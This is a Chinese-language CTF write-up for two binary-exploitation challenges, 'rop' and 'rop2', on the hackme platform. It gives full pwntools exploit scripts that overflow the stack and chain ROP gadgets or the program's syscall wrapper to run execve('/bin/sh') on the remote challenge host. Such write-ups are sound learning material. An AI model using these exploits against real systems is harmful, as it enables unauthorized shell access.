rop 和 rop2 writeup

题目来源:国外的一个ctf平台hackme

rop

hint: ROP buffer overflow
防护机制:

image.png

拖到IDA反编译一下

image.png

可以看到有很多函数 ,不管是用到的还是没用的都有,说明它编译时用的是静态连接
我们可以通过ROPgadget 来直接构造ropchain
命令为 ROPgadget –binary rop –ropchain

栈的大小可以通过peda的pattern search 来找到
先生成 长度为100的字符串 pattern create 100
然后执行程序

image.png

栈的大小为12
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *  
from struct import pack
sh = remote('hackme.inndy.tw',7704)
junk = 'a'*12 + "BBBB" # junk + ebp

p = junk
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

sh.sendline(p)
sh.interactive()

rop2

hint:ROPgadget not working anymore
说明不可以再通过ROPgadget来获取ropchain了
检查下防护机制 只开启了NX

简单运行了一下程序:

image.png

程序要求你输入一串字符串 然后打印出了一堆东西

将程序拖到ida中,来一手f5大法

image.png

发现了syscall函数 ,查了一下发现程序中的syscall(4,1,&v4,42) 和syscall(3,0,&v1,1024) 分别调用了write()函数和read函数的系统调用

解题思路:
将syscall中的第一个参数设置为execve()函数的调用号,第二个

参数设置为“/bin/sh”参数的地址 来执行execve()获取shell

execve()函数的系统调用号 为0xb

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import*  
p = remote('hackme.inndy.tw',7703)
elf = ELF('./rop2')
bss = elf.bss()
syscall = elf.symbols['syscall']
overflow = elf.symbols['overflow']

p.recv()
payload = 'a'*0xC + 'bbbb' + p32(syscall) + p32(overflow) # junk + target_address + return_address
payload += p32(3) + p32(0) + p32(bss) + p32(8) #syscall(3,0,bss_add,8)
p.send(payload)
p.send("/bin/sh\x00")

payload1 = 'a'*0xc + "BBBB" + p32(syscall)
payload1 += p32(overflow)+ p32(0xb) + p32(bss) + p32(0) + p32(0) #syscall(0xb,bss_add,0,0) = execve("bin/sh",0,0)

p.send(payload1)
p.interactive()